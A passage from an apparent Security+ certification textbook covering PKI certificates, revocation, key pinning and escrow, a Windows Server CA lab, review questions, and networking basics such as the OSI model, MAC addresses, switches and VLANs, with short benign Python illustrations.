2. The applicant presents the public key to the CA, along with a document called a certificate signing
request (CSR). The CSR is formatted in similar notation to the certificate itself, and includes all the
applicant's identifying information. Depending on security level, the application might be over a secure channel, or
might be a physical meeting.
3. The CA verifies the applicant's identity according to its CPS. This might involve checking credentials,
contacting the applicant, or performing other investigation. The CA might delegate this part of the process
to a registration authority (RA).
4. The CA signs the certificate and disseminates it to the applicant and to the CA's repository sites.
When a certificate expires, the CA needs to renew it by issuing a new certificate. The process is the same as
assigning the original certificate, though the CA might have an easier validation process. Sometimes, a
renewal doesn't even require a new CSR.
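The first two steps of the application process above can be sketched with the third-party Python "cryptography" package; the subject names below are made up for illustration.

    from cryptography import x509
    from cryptography.x509.oid import NameOID
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import rsa

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)   # stays private

    csr = (
        x509.CertificateSigningRequestBuilder()
        .subject_name(x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, "www.javatucana.com"),
            x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Java Tucana"),
        ]))
        .sign(key, hashes.SHA256())   # proves the requester holds the matching private key
    )

    # The PEM text of the CSR is what gets submitted to the CA.
    print(csr.public_bytes(serialization.Encoding.PEM).decode())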


Certificate types
A CA can issue a number of certificate types to serve different purposes. Each type can have its own
validation requirements, validity period, and in the case of a commercial CA, application cost. Some
certificate types include:

Exam Objective: CompTIA SY0-501 6.4.3.1, 6.4.3.2, 6.4.3.3, 6.4.3.5, 6.4.3.6, 6.4.3.7, 6.4.3.9, 6.4.3.10

Limited purpose The CA can specify what purposes a certificate should and should not be used for. For
example, certificates that can be used to sign contracts, make purchases, or sign code are
typically held to higher standards than those which cannot.
Email Usable for sending and receiving SMIME email messages; also known as SMIME
certificates. They are a common example of a limited certificate, and only require that
you prove you own the associated email address.
Code signing Used to sign an executable file to authenticate its source and guarantee its integrity.
Before installing an application or driver, an operating system can verify the signature to
make sure the file hasn't been forged.
SAN A typical certificate identifies only a single entity, such as a person, business, or website
name. By using a Subject Alternative Name extension, a certificate can contain multiple
names, such as multiple website domain names run by a single organization, or both the
website and the organization itself. For example, www.javatucana.com and
corporate.javatucana.com could be covered by a single multi-domain certificate.
Wildcard A multi-domain certificate that can apply to any number of subdomains within a single
domain. For example, a wildcard certificate for *.javatucana.com would apply to any
hostname in the javatucana.com domain, even if it didn't yet exist when the certificate
was issued.
Extended A certificate backed by a stricter identity validation process than the CA's default. For
Validation (EV) SSL certificates used on the web, sites with a valid EV certificate show a distinct green
color in the browser's address bar. Generally, an EV certificate cannot also be a wildcard,
but it might be multi-domain.

Also important is the difference between user certificates which represent a specific user, and computer or
machine certificates that represent a computer. Machine certificates are used to identify servers or
authenticate client machines on the network, while user certificates are used for email authentication systems,
EFS file encryption, or other situations where a specific user must be identified.

Certificate revocation
If everything's going well, the application process makes sure a certificate doesn't go to the wrong people, the
cryptographic signatures make sure it can't be forged, and the validation period means it won't be around long
enough to likely be compromised. Since all of these can fail, it's essential that a CA be able to revoke a
certificate if necessary, and for anyone verifying a signature to make sure it hasn't been revoked.

Exam Objective: CompTIA SY0-501 2.3.5, 6.4.1.3, 6.4.1.4, 6.4.2.2


There are a number of reasons a CA can revoke a certificate. It could have been issued by mistake, or its
holder might have violated the CA's policy requirements. More commonly, CAs revoke certificates whose private
keys have been compromised.
The X.509 standard specifies two revocation states:
 Revoked: The certificate is irreversibly invalidated, and a new one must be issued.
 Hold: The certificate is temporarily invalid, but can be reinstated or permanently revoked later. This is
used when a CA has doubts about a certificate but hasn't made a permanent decision.


Part of the duties of a CA is to maintain a list of all revoked certificates, and make sure that they're
communicated to all users in a timely manner. This can be done one of two ways.

Certificate A list containing the serial numbers of all revoked certificates, published regularly to a
Revocation List website so that users can download or consult it on demand. Like a certificate, the CRL is
(CRL) itself signed by the CA to authenticate it, and it has a validity period. CAs publish their
CRLs to a location specified in the CA's certificate, and might update them daily or even
hourly.
Online Certificate A request/response protocol used over HTTP. A client uses OCSP to contact the CA
Status Protocol directly and ask about the revocation status of a particular certificate. Since an OCSP
(OCSP) request is much smaller than a full CRL, this can save significantly on network resources,
and since it doesn't rely on publication periods it can always be up to date. For these
reasons, OCSP is generally seen as a more flexible and modern alternative to CRL.

One drawback of OCSP is that the popularity of certificates means there are a lot of requests for OCSP status.
This increases traffic greatly to CAs, and also means clients often need to check with CAs. One way around
this is by OCSP stapling. In the stapling process, the server periodically verifies its own certificate status and
receives time-stamped response signed by the CA. When the server performs a TLS handshake with a client,
it presents its OCSP response along with its certificate. While this might sound a little insecure at first, it isn't:
since the response is time-stamped and signed directly by the CA, the client can trust that it is both recent and
genuine, just as if it had performed the OCSP request itself. The overall process is very much like a
Kerberos client presenting its ticket.
In theory, a subordinate CA's certificate can be revoked by its parent; in that case, all certificates the
subordinate CA had signed with that key would themselves become untrusted. A root certificate can't be revoked:
it would need to be manually removed from certificate stores on each user system.
This happened in 2011 when DigiNotar, a CA which held root certificates both for commercial websites and
the Dutch government, was compromised and used to issue hundreds of fraudulent certificates. All major browsers
quickly issued updates to invalidate all potentially affected root certificates, so the damage was limited;
however, DigiNotar wasn't so lucky. The severity of the incident undermined public trust in the CA enough
that even its untouched keys were later invalidated. Within a month of the breach being reported, DigiNotar
itself was bankrupt and being liquidated: another lesson in how one security failure can destroy an entire
organization.

Key pinning
By now you might have the idea that PKI certificates are pretty secure. In fact, they do work pretty well, but
there are still ways fraudulent certificates can be used to carry out man-in-the-middle attacks. One way
around this is key pinning, where a client stores copies (or hashes) of a known server's certificate or public
key; whenever it connects to that server again, it verifies that the presented certificate is identical, rather
than a fraudulent copy claiming to represent the same server name.

Exam Objective: CompTIA SY0-501 6.4.2.3


Key pinning is most useful for SSL/TLS applications that primarily connect to a short list of known servers,
as opposed to web browsers, which might connect to any number of secure websites; but since web browsers
are one of the main targets of attackers, it's a popular solution even there. Key pinning is supported by Chrome
and Firefox, using two methods.
• In static pinning, the browser's publisher pins keys of especially high-traffic sites such as Google or
Twitter in the browser installation itself.
• Dynamic pinning uses the IETF standard HTTP Public Key Pinning (HPKP). When a client first
contacts a server using HPKP, it pins the key and checks against it every subsequent time it contacts the
same server. That way, if the key changes, something is wrong. A simple pin check is sketched below.
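
As an illustration only (not how any particular browser implements pinning), here's a minimal Python sketch of
a pin check that hashes a server's DER-encoded certificate and compares it against a previously stored value.
The hostname and the stored pin are placeholders.

    import hashlib
    import ssl

    PINNED_SHA256 = "d4e5f6..."   # hypothetical pin recorded on an earlier, trusted connection

    def certificate_fingerprint(host, port=443):
        # Retrieve the certificate the server presents during the TLS handshake
        pem = ssl.get_server_certificate((host, port))
        der = ssl.PEM_cert_to_DER_cert(pem)
        return hashlib.sha256(der).hexdigest()

    if certificate_fingerprint("www.example.com") != PINNED_SHA256:
        print("WARNING: presented certificate does not match the pinned value")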

Like any other security measure, key pinning isn't perfect, and sometimes can introduce problems of its own.
HPKP won't protect you if the first time you connect to a server you're connecting to a fraudulent one. In fact,
your browser will believe the fraudulent server to be real and the real one to be fraudulent. Both static and
dynamic methods have the problem that if a legitimate server has a certificate that expires, or which needs to
be reissued, it will no longer match the pinned key. With normal TLS this isn't a problem as long as the new
certificate is signed by a trusted CA, but against a pinned key it will fail validation.

Key archival and recovery


Much of the security of key pairs revolves around the fact that a private key never needs to leave the system
that generated it, and thus will never be exposed to an attacker during transmission. This raises security
questions when it comes to backing up systems or storage devices that contain private keys. Many systems
allow special rules to be applied to key archives during backup processes, and a CPS issued by a CA might
include guidelines about how private keys should or should not be stored.

Exam Objective: CompTIA SY0-501 1.6.16

 Private keys can be backed up along with the rest of a system. This is often simplest, but it means that
the entire backup needs to be treated as securely as the key itself would be.
• Alternatively, private keys can be left out of backups entirely; if they're lost, you simply apply for a
new certificate. This minimizes the chance of a key being stolen, but makes it more likely the key will be
lost along with other data.
• A compromise between the two is to back up key stores and their corresponding certificates separately
from other data. Typically, a key store backup is small and easy to protect with strong encryption or
other security measures, as sketched after this list.
 Dedicated hardware storage modules used to contain particularly valuable keys typically include their
own secure backup functions.
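
As one example of the compromise strategy above, here's a minimal Python sketch (using the third-party
cryptography package, with an invented key, passphrase, and file name) of exporting a private key as a
separate, passphrase-protected backup file:

    from cryptography.hazmat.primitives import serialization
    from cryptography.hazmat.primitives.asymmetric import rsa

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)  # stand-in for a real key

    # Serialize the key in PKCS#8 PEM form, encrypted with a passphrase
    encrypted_pem = key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.PKCS8,
        encryption_algorithm=serialization.BestAvailableEncryption(b"use-a-strong-passphrase"),
    )

    # Store this file (and its passphrase) under the same controls you'd apply to the key itself
    with open("key-backup.pem", "wb") as f:
        f.write(encrypted_pem)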

Which strategy to choose depends not only on the CPS, but on what the key is to be used for. If a key is used
for transport encryption, such as on a secure website with an SSL certificate, losing the key would mean an
inconvenient, and perhaps expensive, reapplication process; on the other hand, the key being stolen could lead
to much greater damage. In that case, you might choose not to back up the key at all. By contrast, losing the
only key that can decrypt an encrypted drive would mean losing all the data entirely, so some sort of backup
in that case is essential.
Keys can also be securely stored with an authorized third party in a key escrow process. Frequently the term
is specifically used for key storage required by an external authority which wants to guarantee access to the
protected data, such as a larger organization or government agency. Since transmitting and sharing a private
key always introduces vulnerabilities, mandatory key escrow is controversial even when the third party's
motivations aren't in question.
When keys are properly archived, it is difficult by design to retrieve them. Some systems use a key recovery
agent, a designated individual with the ability to restore lost keys using a key recovery certificate. Key escrow
can also be used for key recovery; for example, BitLocker drive encryption allows a recovery key to be stored
on a domain server or in a user's Microsoft account.

Exercise: Installing a certificate authority


In this exercise, you'll use the Windows Server 2012 VM to install a CA and prepare to issue certificates.
Do This How & Why

1. In Windows Server 2012, install the


Active Directory Certificate Services
role.

a) In Server Manager, click Manage > The Add Roles and Features Wizard window opens.
Add Roles and Features.

b) Click Next three times. Until you reach the Select server roles screen.

c) Check Active Directory


Certificate Services.

You're asked whether to add other required features.

d) Click Add Features. To close the pop-up window.

e) Click Next three times. Until you reach the Select role services screen.

f) Check all role services except Click Add Features when prompted.
Network Device Enrollment
Service.

g) Click Next three times, then click The process may take a few minutes.
Install.

h) Click Close. A warning flag appears in Server Manager, indicating that you
need to configure the CA.

2. Configure Active Directory Certificate


Services.


   a) Click the warning flag. A Post-deployment Configuration warning pop-up appears.

   b) Click Configure Active Directory Certificate Services on the designated server. The AD CS Configuration wizard opens.

   c) Click Next. To install using Administrator's credentials. The Role Services screen appears.

   d) Check Certification Authority, Certification Authority Web Enrollment, and Online Responder.

   e) Click Next. To move to the Setup Type screen.

   f) Verify that Enterprise CA is selected and click Next. Enterprise CAs work as part of Active Directory.

   g) Verify that Root CA is selected and click Next. You're starting a whole new PKI infrastructure.

3. Create a private key and root certificate for the CA.

   a) Verify that Create a new private key is selected and click Next. If you were reinstalling a CA, you could use your existing private key. To move to the Cryptography screen.

   b) From the hash algorithm list, click SHA256. You'll keep the default setting of a 2048-bit RSA key, but SHA1 hashes are no longer recommended for digital certificates.

   c) Click Next. To view the CA name screen.

   d) Edit the Common name field to read mwha-CA and click Next.


   e) Click Next twice. To accept the default validity period of five years, and the default database location. Your final settings are displayed.

   f) Click Configure, then Close. The configuration may take a minute to complete. You're asked whether to configure additional role services.

4. Configure additional role services.

   a) In the AD CS Configuration window, click Yes. A new wizard opens.

   b) Click Next. The Role Services window shows the roles you just installed as automatically checked.

   c) Check Certificate Enrollment Web Service and Certificate Enrollment Policy Web Service, then click Next. They're the last two on the list.

   d) Click Next. To accept the default CA and move to the Authentication type screen.

   e) Verify that Windows integrated authentication is selected and click Next. Now you need to specify a service account for CES.

   f) Click Select. A login window appears.

   g) Enter Administrator's credentials and click OK. Username: Administrator, Password: P@ssw0rd (or whatever you've changed it to). Note: In real life you'd give the CA its own account and password for more security.

   h) Click Next.


   i) Verify that Windows integrated authentication is selected and click Next. Now you need to select a server certificate.

   j) In the Certificate list, click mwha-CA, then click Next. If any other certificates are there, ignore them.

   k) On the Confirmation screen, click Configure, then Close.

5. Manage certificate templates.

   a) In Server Manager, click Tools > Certification Authority. The Certification Authority console opens.

   b) In the left pane, expand mwha-ca.

   c) Right-click Certificate Templates and click Manage. The Certificate Templates Console window opens.

   d) Scroll through the list of templates. You can create templates for users, computers, multiple server types, and assorted network protocols. Some have an intended purpose listed.

6. Configure a new template.


   a) Right-click User and click Duplicate Template. Near the end of the list. A Properties window appears.

   b) On the General tab, change the Template display name to Employees. The Template name is automatically changed to match.

   c) On the Request handling tab, select Encryption from the Purpose list. Click Yes in the confirmation window.

   d) Check Archive subject's encryption private key. Click OK in the warning window if prompted.

   e) Examine the other tabs in the window. You won't change any other properties.

   f) Click OK. The new template is added to the list.

   g) Close the Certificate Templates Console. The Certification Authority console is still open.

7. Enable the Employees template on the server.


   a) Right-click Certificate Templates and click New > Certificate Template to Issue. The Enable Certificate Templates window appears. Employees is in the list.

   b) Select Employees and click OK.

   c) Click the Certificate Templates folder. Employees is in the list. Now users can request certificates based on the template.

8. Close the Certification Authority console.

The Certification Authority console at the end of the exercise.

Assessment: Public key infrastructure


1. What is true of a digital certificate, but not true of a digital signature? Choose all that apply.
 Has a valid starting and ending date
 Proves the authenticity of a message
 Proves the authenticity of a person or system
 Provides non-repudiation


2. What defines an EV certificate? Choose the best response.


 It applies to more than one domain
 It lasts longer than a normal certificate
 It requires a stricter identity verification process on application
 It uses stronger cryptography

3. What's generally seen as the most modern and flexible way to find out if a certificate has been revoked?
 ASN.1
 CRL
 CSR
 OCSP

4. Your employer demands a copy of all private keys used on devices you use for work, since regulations
require them to be able to decrypt any official communications when legally requested.
What is this an example of?
 Key escrow
 Key recovery
 PKI hierarchy
 Revocation

5. What certificate formats commonly use the web of trust model? Choose the best response.
 ASN.1
 Bridge
 OpenPGP
 X.509

6. What certificate encoding is intended for use in secure email? Choose the best response.
 CER
 DER
 PEM
 PFX

7. An attacker has gotten a fraudulent certificate claiming to be for your bank and is planning to intercept your
transactions in a man-in-the-middle attack. The certificate hasn't been revoked yet, but what technology
could still let you know something is wrong?
 Escrow
 Pinning
 OCSP
 Stapling


Summary: Cryptography
You should now know:
 About the primary branches of modern cryptography, including symmetric and asymmetric ciphers,
hashes, and steganography. You should also know how the different types are used together for tasks
one couldn't perform alone, such as for key exchange and digital signatures.
 How digital certificates are created, used, and revoked as part of a PKI structure.



Chapter 4: Network fundamentals
You will learn:
 About network components
 About IP addresses
 About network ports and applications


Module A: Network components


Networks are a key part of any security strategy. Not only are they the chief vector for many attacks, but data
is often at its most valuable when it's in transit. The increasing importance of networks to almost any
organization has its own repercussions: not only does it become harder simply to avoid connecting vulnerable
devices, but disrupting network functions is itself the goal of many attackers.
The Security+ exam doesn't focus on the details of installing and maintaining networks themselves—that's
Network+, which is its own book. But it does assume that students have a working knowledge of network
functions and protocols as the underlying context of network-based threats and security controls, so it's a good
idea to refresh yourself on those functions and the devices which perform them.
You will learn:
 About the OSI and TCP/IP models
 About Data Link layer technologies and devices
 About Network layer protocols and devices
 About non-IP networks and network convergence

Network models
Networks are built from many interrelated parts, made by different vendors, that serve different
functions, so it's important that network engineers have the ability to describe how these parts work together.
This isn't just important for troubleshooting problems with existing networks: it's also important for
understanding what functions and responsibilities each component has. This way, if you want to replace or
upgrade one element of the network you won't introduce compatibility problems, and if you want to add new
functionality you can judge the best place to fit it into existing networks. This sort of problem is common in
technology fields, and the frequent solution is reference models using abstraction layers to separate what part
of the system any particular piece of hardware, software, or other element occupies.
There are two primary reference models used to describe networks. Both were invented at roughly the same
time, but by different people designing different networks. Consequently, while the two models have a lot of
similarities, and both are used in reference to the same networks today, they are also very different.

OSI (Open Systems Interconnect): Designed beginning in 1977 by the ISO, with the intention of producing a suite
of network protocols that would become the world's primary network standards. This didn't really happen, and
while some OSI protocols became important, most were never widely used. On the other hand, the model itself
found a very important place as an educational tool and theoretical reference for the development of network
technologies. Since it's very good even at explaining systems designed under different models, network
technicians are well-versed in the OSI model and use it in their daily work.

TCP/IP (Internet Protocol Suite): Developed from the 1960s through the 1980s by the US Department of Defense
and today maintained by the IETF, TCP/IP is named for two of its most important protocols, Transmission Control
Protocol (TCP) and Internet Protocol (IP). This naming actually says a lot about the difference between the two:
TCP/IP was originally developed to solve a practical set of networking problems for the US military, so its
creators designed the protocols and the descriptive model side by side. While the core protocols of TCP/IP
became the dominant standards of the internet and today's other networks, the model itself is less
comprehensive. In fact, since it's protocol-dependent you could even call it a network standard or
implementation rather than a network model.


Remember that both of those models were designed decades ago, when networks behaved much differently
than they do today. While some device types and protocols from those days are still in common use and fit
neatly into the original models, modern developments have blurred the lines in a lot of cases. Security
technologies are no exception.

The OSI model


The OSI model is made up of seven layers, arranged vertically in what is called a stack. They're numbered
from the bottom up. Ideally a given communications protocol or network appliance can be described by the
layer it occupies, though in practice a real world example might span multiple adjacent layers.

Layer 1, Physical: Transmission and reception of data in a raw bit stream across physical media, including
character encoding and decoding. Layer 1 protocols interface directly with the hardware of the connection so
are generally tied to a specific medium and speed standard, such as the 1000BASE-T used by Gigabit Ethernet, or
802.11n Wi-Fi. Layer 1 devices on the network include hubs, wireless access points, or the lower-level
components of a NIC.

Layer 2, Data Link: Translates Physical layer bits to and from ordered packets called frames, and transfers
them between nodes on the same network. Layer 2 protocols include Ethernet, 802.11, and Frame Relay. Layer 2
devices include bridges, simple switches, and the upper-level functions of a NIC.

Layer 3, Network: Creates paths through the logical network for the transmission of data. This includes
managing logical network addresses, routing data across interconnected networks, and improving network
reliability through error and congestion control. Layer 3 protocols include IPv4, IPv6, IPX, and MPLS. Layer 3
devices include more complex switches and routers.


Layer 4, Transport: Delivers data from host to host along the paths created by the Network layer. The Transport
layer also translates between network packets and the data used by applications; in general, it can be seen as
the interface between a computer and the network. Layer 4 protocols include TCP, UDP, and SPX. Intelligent
switches and gateways might incorporate functions of layers 4 and higher to help shape network traffic.

Layer 5, Session: Establishes sessions, or defined conversations, between applications on different hosts.
Sessions must be created, maintained separately from other sessions, and ended. Layer 5 protocols include
NetBIOS, NFS, and the sockets used by TCP and UDP.

Layer 6, Presentation: Controls the formatting and security of data. Sometimes called the syntax layer. Layer 6
protocols include network encryption protocols like TLS and SSL, or formatting methods like MIME. They also
include data formats you might not normally think of in network terms, like ASCII, XML, or MPEG.

Layer 7, Application: Provides services used by host applications. Layer 7 protocols include HTTP, FTP, Telnet,
and email. The Application layer is not the same as the applications themselves: your web browser is not part
of Layer 7, it just communicates with the network through the HTTP protocol.

You might hear network cables themselves discussed as "Layer 0" of the stack, but important as they are
they're not formally a part of the OSI model. Likewise, network technicians and security experts may
informally call users and organizations "Layer 8" to describe the human factor of network functions.
Communications between network devices and services need to pass down through the stack on the source
node, then back up on the destination node. Usually this means that data from a higher level protocol must be
encapsulated in a lower level protocol. For example, when your web browser sends a request to a web server
on the same local network, both are using the Layer 7 HTTP protocol. To reach the server the data must be
formatted by the Presentation layer, directed to a Session layer socket, and encapsulated in a TCP segment.
The segment then is placed in an IP packet, which is placed in an Ethernet frame, which is transmitted bit-by-
bit at 1000BASE-T. Once the data reaches the server, the whole process is reversed, and the data is handed off
to the web server itself.
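
As a small illustration, the Python sketch below sends that kind of Layer 7 request; the hostname is a
placeholder, and everything below the Application layer (TCP segments, IP packets, Ethernet frames) is handled
by the operating system's protocol stack rather than the application.

    import socket

    HOST = "intranet.example.com"   # placeholder web server on the local network
    request = b"GET / HTTP/1.1\r\nHost: intranet.example.com\r\nConnection: close\r\n\r\n"

    # create_connection() opens a TCP session; the OS encapsulates everything below Layer 7
    with socket.create_connection((HOST, 80)) as sock:
        sock.sendall(request)              # Application layer data handed down the stack
        reply = sock.recv(4096)            # data de-encapsulated on the way back up
        print(reply.split(b"\r\n")[0])     # e.g. b'HTTP/1.1 200 OK'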

The TCP/IP model


The TCP/IP model consists of a stack of four vertical layers. Each roughly corresponds to one or more OSI
layers and performs most of the same functions, though the boundaries between them can be somewhat
different.


Network Interface: Also known as the Network Access layer or Link layer, this defines how nodes communicate at
the local network and adapter level; corresponds to OSI Layers 1 and 2. Network Interface protocols can include
Ethernet and Wi-Fi used in LANs, or ATM and Frame Relay used in WANs.

Internet: Controls the routing of packets across multiple logical networks; corresponds to OSI Layer 3. The core
protocol of this layer is IP itself, which carries most network data. The Internet layer also includes control
protocols used to maintain network function, such as ICMP.

Transport: Manages end-to-end communication between hosts, and breaks application data up into the segments or
datagrams sent over the network; corresponds to OSI Layer 4. The primary protocols on this level are TCP and
UDP. Both carry network data, but TCP is designed to establish stable and reliable connections while UDP is
designed for communications where speed and resource overhead are more important than reliability.

Application: Allows user-level applications to access the other layers; corresponds to OSI Layers 5-7. Each type
of network application has its own application protocol type, and more are continually being added. Familiar
ones include web protocols like HTTP, file transfer protocols like FTP, and email protocols like SMTP, POP, and
IMAP. Other Application layer protocols are associated with network services, like DNS, SNMP, and RIP.

As you might have noticed, TCP/IP accepts a great number of protocols at its lowest and highest layers, where
it has to interface with network hardware and host applications. By contrast, the Internet and Transport layers
consist of a small number of tightly integrated protocols used by almost everything on the internet.
TCP/IP also defines communications differently than OSI. Instead of theoretical relationships between layers,
TCP/IP relies on concrete relations between protocols. It also assumes that protocols can be designed to rely
on other protocols within their same layer.
Finally, and most importantly for security, TCP/IP protocols were designed according to the robustness
principle, first stated in an early TCP specification document as "TCP implementations should follow a
general principle of robustness: be conservative in what you do, be liberal in what you accept from others."
What this means is that TCP/IP protocols are expected to send data that conforms strictly to protocol
standards, but attempt to decipher and accept non-standard but intelligible data they receive from other
protocols.
The robustness principle is another example of how what's good for basic functionality can be bad for other
parts of security. While it's great for designing networks that function well regardless of shoddy
implementations or configuration errors, it allows attackers to send deliberately non-standard data that will
trick a receiving system into doing unsafe things. This hasn't caused the robustness principle to go away, but
all the same newer protocols tend to be less trusting than older ones.


Discussion: Network models


1. What are the biggest differences between the TCP/IP and OSI models?
Answers may include that the TCP/IP model has fewer layers, that its protocols are in wider use, that it is
less suited for discussion of generalized network topics, or that it is technically a network standard or
implementation rather than a model.
2. If the OSI protocols aren't in current use, why is the reference model so important?
The OSI model clearly explains the general process of networking, and it's widely used in explaining how
actual networks and protocols fit together.
3. What is the robustness principle, and how does it affect security?
The idea that a given protocol should adhere strictly to the official standard when it sends data, but that
when it receives data it should be forgiving of slightly non-standard formats as long as the meaning is
clear. Many TCP/IP attacks are designed to exploit the robustness principle by deliberately misusing
protocols on the assumption that the receiving system will try to process them anyway only to encounter
errors the attacker can exploit.

The Data Link layer


It's not fair to say that the Physical layer of the OSI model is the simplest: to the contrary, since it has to work
on such a wide range of physical hardware and manage the intricacies of encoding binary data into physical
signals, it can be very complex. On the other hand, Layer 1 devices usually shovel data blindly along while
trusting higher-level protocols to know where it's going and what it's doing, and physical technologies are
usually closely tied to the Layer 2 protocols in use.
By contrast, the Data Link layer is home to a number of functions, protocols, and technologies that can be
used to create a functioning network with addresses, traffic direction, and security controls. Layer 2 devices
need to be more "intelligent" than their Layer 1 counterparts, with processing and storage capacity not only to
distinguish the bits and symbols that pass through them, but to interpret some of their contents. This means
they can be more easily exploited by attacks, and also that they can perform more useful security functions.
Some of the more important Data Link layer concepts that have important security ramifications include:
 MAC addresses
 Switches
 Collision and broadcast domains
 VLANs
 Wireless access points

MAC addresses
Layer 1 devices just push data indiscriminately through the network, but higher layers have to make sure data
reaches the right place. On Layer 2, this is done via MAC addresses, originally developed for Ethernet but
widely adopted by other L2 standards like Wi-Fi. MAC addresses get their name from the Media Access Control
sublayer of Layer 2, which is responsible for addressing and for controlling access to the shared medium.
They're also called physical addresses, since in theory every MAC address is unique in the world, corresponding
to a single network adapter or port on a network device such as a router.
MAC addresses are 48-bit numbers, usually written as 12 hexadecimal digits. For readability, they're usually
grouped into pairs, separated by dashes or colons; for example, 10:0D:7F:F3:CE:8F. Sometimes you'll
also see three groups of four separated by periods, such as 100D.7FF3.CE8F. The first six digits are called
the organizationally unique identifier (OUI) and correspond to a device's manufacturer. In this example,
"10:0D:7F" means the device was made by Netgear, Inc. The last six are the device ID, a unique serial number
assigned by the manufacturer. When necessary, network administrators can also manually override a hardware MAC
address with a custom value, called a locally administered address.
Some newer network types, such as those using IPv6 or FireWire, require a 64-bit physical address called an
EUI-64. A 48-bit MAC address can connect to these networks too: the software just inserts 16 extra bits with a
placeholder value in the middle of the address.
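
Here's a small Python sketch that splits the example address above into its two halves; the one-entry vendor
table is hard-coded for illustration, not a real OUI database.

    mac = "10:0D:7F:F3:CE:8F"
    octets = mac.upper().split(":")

    oui = "".join(octets[:3])          # first 24 bits: organizationally unique identifier
    device_id = "".join(octets[3:])    # last 24 bits: vendor-assigned device ID

    vendors = {"100D7F": "Netgear, Inc."}   # hypothetical single-entry lookup table
    print("OUI:", oui, "->", vendors.get(oui, "unknown vendor"))
    print("Device ID:", device_id)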
MAC addresses aren't used for communicating across multiple networks, like on the Internet: that happens at
higher levels of the stack. Instead, they're used strictly by Layer 2 devices on the local network, such as NICs
and switches. Every Ethernet frame has both a source address and a destination address corresponding to a
device on the local network. 802.11 Wi-Fi frames are similar, but add a third MAC address for the wireless
access point.
MAC addresses are important in security as well. They can be part of security controls: access control
systems frequently contain lists of MAC addresses which are allowed or forbidden to join the network. At
the same time, they don't offer real security, and in fact are a common component of local network attacks.
Not only is it easy for a host or device to override its hardware MAC address, but nothing keeps an attacker
from snooping on traffic addressed to a different address, or from falsifying the source address on frames it
sends.

Switches
You can string together an Ethernet network with nothing but L1 devices like repeaters and hubs, but you'll
run into performance problems. Since they don't discriminate when it comes to traffic, a network segment
connected only by L1 devices is all part of the same collision domain, an area where no two devices can
transmit simultaneously. If they do, both frames are lost and both hosts have to retransmit. Ethernet can
correct for collisions, but eventually they start crowding out other traffic, hurting performance. This isn't
good for security either: since a frame can be read by any device on the same collision domain, large L1
networks are highly susceptible to eavesdroppers.

Exam Objective: CompTIA SY0-501 3.2.4.11


To separate collision domains, networks use bridges, more commonly known as switches when they, like
most today, have more than two ports. Unlike a hub, a bridge doesn't immediately pass frames on to other
ports: it waits to see if there is any other host transmitting. If hosts on both sides of the bridge simultaneously
transmit data, the bridge stores both frames, then transmits them in the opposite direction once the segment is
clear.

Some early bridges did nothing more than that, but modern switches also actively control and direct traffic,
forwarding a given frame only to its proper destination segment. To do this, each switch maintains a MAC
table with a list of MAC addresses and the corresponding port on the switch that leads toward that address.
While you can program a MAC table manually, usually the switch learns locations automatically by reading
the source address on each incoming frame. Since switches reduce collisions and help prevent traffic from
going to segments where it isn't needed, a switched network can be much larger than a single collision
domain. This also helps security, since if a switch forwards sensitive traffic from port #1 to port #2, an
eavesdropper on port #3 never gets a chance to listen in.
If the destination address isn't in the MAC table, the frame is flooded to all ports on the switch, in hopes
that one of them leads to the destination host. The same happens if it's addressed to the broadcast address,
FF-FF-FF-FF-FF-FF, indicating that the frame is to be read by all hosts on the network. This also defines the Layer 2
network segment, called the broadcast domain. Normal switches don't segment the broadcast domain, they
only extend it. Eventually, this leads to performance problems: not only can a large enough broadcast domain
be overwhelmed by broadcast traffic, but if multiple paths join any two switches, traffic can form a switching
loop that passes the same frames around and around until they crowd out all other traffic.
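
The following toy Python sketch shows the learning-and-forwarding logic described above; the port numbers and
MAC addresses are invented for illustration.

    mac_table = {}   # learned mapping of MAC address -> switch port

    def handle_frame(in_port, src_mac, dst_mac, all_ports):
        mac_table[src_mac] = in_port   # learn: remember which port this source was seen on

        if dst_mac == "FF:FF:FF:FF:FF:FF" or dst_mac not in mac_table:
            # Broadcast or unknown destination: flood out every port except the ingress port
            return [p for p in all_ports if p != in_port]
        return [mac_table[dst_mac]]    # known unicast destination: forward to one port only

    ports = [1, 2, 3, 4]
    print(handle_frame(1, "AA:BB:CC:00:00:01", "AA:BB:CC:00:00:02", ports))  # flooded: [2, 3, 4]
    print(handle_frame(2, "AA:BB:CC:00:00:02", "AA:BB:CC:00:00:01", ports))  # forwarded: [1]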
Some of these problems can be minimized by using advanced switches with functions that prevent switching
loops and limit other stray traffic, but another part of this is simply picking a network topology that helps
maintain high performance. A large L2 network might arrange switches in a tree formation consisting of three
layers:
 Edge switches which connect to hosts
 Aggregation switches which connect edge switches together, for example to link all switches in a large
wiring closet
 Backbone switches which connect aggregation switches with high performance connections

MAC tables and broadcast domains can affect security too. Spoofed MAC addresses and superfluous
broadcast traffic are commonly used as part of DoS or man-in-the-middle attacks, whether by confusing
switches and hosts or just crowding the network with traffic. Additionally, a host can communicate directly
with any other host on the same broadcast domain, without having to go through a higher level device like a
router or firewall.

VLANs
Traditionally, to split broadcast domains you need to partition the network with routers, and use separate
switches on each segment. This works for some networks, but it's not always ideal. It's usually cheaper to buy
one 24-port switch than two 12-port switches, for example. The traditional way also only works well when LAN
membership correlates with physical location: if each LAN is widely spread out you'll need a lot of redundant
cables or even repeaters.
Switches can solve this problem by partitioning the network in software, creating multiple broadcast domains
called virtual LANs, or VLANs. Each VLAN's traffic is kept separate, just as if they were on physically
different L2 networks. Often each VLAN will correspond to an IP subnet, but that's a matter of convenience
rather than a requirement.
VLANs aren't a single standard, but rather a collection of methods switches can use to partition broadcast
domains. Some of them require multilayer awareness and some don't, but they all work fundamentally at L2.
The simplest sort of VLAN is port-based, or static assignment. All the switch has to do is assign each of its
physical ports to a different VLAN. Frames sent to any port are only forwarded or flooded to ports on the
same VLAN. If you want to connect multiple VLANs, you'll need to connect a router to multiple ports, one
on each VLAN.


Port-based VLAN assignment on a switch.
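
A toy Python sketch of that port-based assignment follows; the port-to-VLAN mapping is invented for
illustration.

    port_vlan = {1: 10, 2: 10, 3: 20, 4: 20}   # switch port -> VLAN ID

    def eligible_ports(in_port):
        # A frame may only be forwarded or flooded to ports in the same VLAN as its ingress port
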